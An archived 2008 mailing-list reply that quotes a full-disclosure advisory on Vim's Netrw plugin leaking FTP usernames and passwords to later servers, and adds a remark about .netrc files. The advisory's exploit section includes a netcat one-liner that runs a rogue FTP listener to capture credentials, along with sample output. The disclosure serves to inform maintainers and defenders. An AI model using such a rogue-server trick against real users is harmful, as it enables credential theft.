full-disclosure-uk August 2008 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: Re: [Full-disclosure] Vim: Netrw: FTP User N

Re: [Full-disclosure] Vim: Netrw: FTP User Name and Password Disclosure

From: Tony Mechelynck <antoine.mechelynck_at_nospam>
Date: Tue Aug 12 2008 - 22:18:05 GMT
To: vim_dev@googlegroups.com


On 12/08/08 23:59, Jan Minář wrote:
> Vim: Netrw: FTP User Name and Password Disclosure
>
> 1. SUMMARY
>
> Product : Vim -- Vi IMproved
> Versions : Tested with Vim 7.1.266, 7.2, autoload/netrw.vim v131, v109
> Impact : Credentials disclosure
> Wherefrom: Remote
> Original : http://www.rdancer.org/vulnerablevim-netrw-credentials-dis.html
>
> The Vim Netrw Plugin shares the FTP user name and password across all
> FTP sessions. Every time Vim makes a new FTP connection, it sends the
> user name and password of the previous FTP session to the FTP server.
>
>
> 2. BACKGROUND
>
> ``Vim is an almost compatible version of the UNIX editor Vi. Many new
> features have been added: multi-level undo, syntax highlighting,
> command line history, on-line help, spell checking, filename
> completion, block operations, etc.''
>
> -- Vim README.txt
>
> ``Netrw supports "transparent" editing of files on other machines
> using [...] vim ftp://hostname/path/to/file''
>
> ``Attempts to use ftp will prompt you for a user-id and a password.
> These will be saved in global variables g:netrw_uid and
> s:netrw_passwd; subsequent uses of ftp will re-use those two items
> to simplify the further use of ftp. However, if you need to use a
> different user id and/or password, you'll want to call NetUserPass()
> first.''
>
> -- Netrw Reference Manual (``pi_netrw.txt'')
>
>
> 3. VULNERABILITY
>
> Once vim successfully connects to an FTP server using a user name and
> password credentials, it will re-use them in all subsequent FTP
> sessions, regardless of the domain name or TCP port.
>
> This behaviour is documented, although the documentation states the
> credentials are ``retained on a per-session basis''. Apparently the Vim
> session, not the FTP session:
>
> ``g:netrw_uid (ftp) user-id, retained on a per-session basis
> s:netrw_passwd (ftp) password, retained on a per-session basis''
>
> -- Netrw Reference Manual (``pi_netrw.txt'')
>
> Although FTP communication is not encrypted and therefore open to
> eavesdropping, if the access to the network is protected, a
> credentials-based access control is meaningful, and the credentials must
> be kept secret. For example, an FTP connection to a virtual Xen
> instance on the same physical machine is secure; so is an FTP session
> over a local ethernet segment secured against access from untrusted
> parties.
>
>
> 4. EXPLOIT
>
> No adversary action on the part of the attacker is necessary, apart from
> keeping logs of the user name, password, source IP address, and other
> information about the FTP session.
>
> An example using netcat(1) for the rouge FTP server. There is another
> FTP server already running on the machine:
>
> # For the sake of this example, a custom hosts file. Note that
> # ftp.secure.example and ftp.rogue.example map to different IP
> # addresses.
> $ grep '\.example' /etc/hosts
> 127.0.1.1 ftp.secure.example
> 127.0.1.2 ftp.rogue.example
> # There is a stock FTP server running already
> $ netstat -plan | grep ftp
> tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 30623/vsftpd
> # Start the rogue FTP server
> $ printf '220\r\n331\r\n' \
> | netcat -lp 31337 ftp.rogue.example> credentials&
> # We use the ex command for clarity.
> $ ex ftp://ftp.secure.example/
> Enter username: rdancer
> Enter Password: *************
> Entering Ex mode. Type "visual" to go to Normal mode.
> :spl ftp://ftp.rogue.example:31337/
> "ftp://ftp.rogue.example:31337/" --No lines in buffer--
> :qa!
> $ cat credentials
> USER rdancer
> PASS z5vS24u76OrGM
>
>
> 5. COPYRIGHT
>
> This advisory is Copyright 2008 Jan Minar<rdancer@rdancer.org>
>
> Copying welcome, under the Creative Commons ``Attribution-Share Alike''
> License http://creativecommons.org/licenses/by-sa/2.0/uk/
>
> Code included herein, and accompanying this advisory, may be copied
> according to the GNU General Public License version 2, or the Vim
> license. See the subdirectory ``licenses''.
>
> Various portions of the accompanying code may have been written by
> various parties. Those parties may hold copyright, and those portions
> may be copied according to their respective licenses.
>
>
> 6. HISTORY
>
> 2008-08-12 Sent to:<bugs@vim.org>,<vim-dev@vim.org>,
> <full-disclosure@lists.grok.org.uk>,
> <bugtraq@securityfocus.com>,
> Charles E Campbell, Jr (Vim Netrw Plugin Maintainer)
> <drchip@campbellfamily.biz>

If the attacker has access to full logs of the FTP back-and-forth talk, is it possible to keep the username and password secret?

Netrw mentions that if there exists a .netrc file (which ftp will use if it is not world-readable, e.g. on Linux it needs 600 permissions) which includes an applicable "machine" or "default" line, the user won't be asked for a username and password (see ":help netrw-netrc"). I'm not sure whether and to what degree this applies to non-Unix-like OSes such as Windows.

Best regards,
Tony. -- Lysistrata had a good idea. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/